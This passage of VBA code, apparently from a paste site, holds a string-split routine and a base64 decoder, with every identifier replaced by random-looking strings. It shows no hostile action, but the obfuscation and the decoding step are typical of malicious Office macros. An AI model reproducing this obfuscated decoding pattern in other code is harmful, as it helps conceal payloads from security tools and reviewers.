  1531.    
  1532.     If N6LHhLlux = vbNullString Then N6LHhLlux = Chr(32)
  1533.     WDhIDUXmY = Len(N6LHhLlux)
  1534.     If KUmyJx5Jh = 0 Then GoTo QuitHere
  1535.     If pOKAiWpG0 = 0 Then GoTo QuitHere
  1536.     If InStr(1, iUGqUtdps, N6LHhLlux, vbBinaryCompare) = 0 Then GoTo QuitHere
  1537.    
  1538.     ReDim kVaXV9w2y(0)
  1539.     tPwdtDwaY = 1
  1540.     rWOEH4K43 = 1
  1541.    
  1542.     Do
  1543.         If zuPGbqBU9 + 1 = KUmyJx5Jh Then
  1544.             kVaXV9w2y(zuPGbqBU9) = Mid$(iUGqUtdps, tPwdtDwaY)
  1545.             Exit Do
  1546.         End If
  1547.         rWOEH4K43 = InStr(rWOEH4K43, iUGqUtdps, N6LHhLlux, vbBinaryCompare)
  1548.         If rWOEH4K43 = 0 Then
  1549.             If Not tPwdtDwaY = pOKAiWpG0 Then
  1550.                 kVaXV9w2y(zuPGbqBU9) = Mid$(iUGqUtdps, tPwdtDwaY)
  1551.             End If
  1552.             Exit Do
  1553.         End If
  1554.         kVaXV9w2y(zuPGbqBU9) = Mid$(iUGqUtdps, tPwdtDwaY, rWOEH4K43 - tPwdtDwaY)
  1555.         zuPGbqBU9 = zuPGbqBU9 + 1
  1556.         ReDim Preserve kVaXV9w2y(zuPGbqBU9)
  1557.         tPwdtDwaY = rWOEH4K43 + WDhIDUXmY
  1558.         rWOEH4K43 = tPwdtDwaY
  1559.     Loop
  1560.    
  1561.     ReDim Preserve kVaXV9w2y(zuPGbqBU9)
  1562.     rZjOyBMBM = kVaXV9w2y
  1563.    
  1564.     Exit Function
  1565.    
  1566. QuitHere:
  1567.     ReDim rZjOyBMBM(-1 To -1)
  1568. End Function
  1569.  
  1570.  
  1571.  
  1572.  
  1573.  
  1574. Public Function duWDA4jsx(W7BErUZth As String) As String
  1575.  
  1576.     Dim weEl5jr9r() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
  1577.     Dim bCfrzfp5w(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
  1578.     Dim ODb2b533C As Long
  1579.  
  1580.     W7BErUZth = Replace(W7BErUZth, vbCr, vbNullString)
  1581.     W7BErUZth = Replace(W7BErUZth, vbLf, vbNullString)
  1582.  
  1583.     ODb2b533C = Len(W7BErUZth) Mod 4
  1584.     If ODb2b533C Then Exit Function
  1585.        
  1586.    
  1587.     If InStrRev(W7BErUZth, "==") Then
  1588.         iPad = 2
  1589.     ElseIf InStrRev(W7BErUZth, "=") Then
  1590.         iPad = 1
  1591.     End If
  1592.      
  1593.     For ODb2b533C = 0 To 255
  1594.         Select Case ODb2b533C
  1595.             Case 65 To 90
  1596.                 bTrans(ODb2b533C) = ODb2b533C - 65
  1597.             Case 97 To 122
  1598.                 bTrans(ODb2b533C) = ODb2b533C - 71
  1599.             Case 48 To 57
  1600.                 bTrans(ODb2b533C) = ODb2b533C + 4
  1601.             Case 43
  1602.                 bTrans(ODb2b533C) = 62
  1603.             Case 47
  1604.                 bTrans(ODb2b533C) = 63
  1605.         End Select
  1606.     Next ODb2b533C
  1607.  
  1608.     For ODb2b533C = 0 To 63
  1609.         lPowers6(ODb2b533C) = ODb2b533C * 64
  1610.         lPowers12(ODb2b533C) = ODb2b533C * 4096
  1611.         bCfrzfp5w(ODb2b533C) = ODb2b533C * 262144
  1612.     Next ODb2b533C
  1613.  
  1614.     bIn = StrConv(W7BErUZth, vbFromUnicode)
  1615.     ReDim weEl5jr9r((((UBound(bIn) + 1) \ 4) * 3) - 1)
  1616.    
  1617.     For lChar = 0 To UBound(bIn) Step 4
  1618.         lQuad = bCfrzfp5w(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
  1619.                 lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
  1620.         ODb2b533C = lQuad And 16711680
  1621.         weEl5jr9r(lPos) = ODb2b533C \ 65536
  1622.         ODb2b533C = lQuad And 65280
  1623.         weEl5jr9r(lPos + 1) = ODb2b533C \ 256
  1624.         weEl5jr9r(lPos + 2) = lQuad And 255
  1625.         lPos = lPos + 3
  1626.     Next lChar
  1627.  
  1628.     sOut = StrConv(weEl5jr9r, vbUnicode)
  1629.     If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
  1630.     duWDA4jsx = sOut
  1631.  
  1632. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement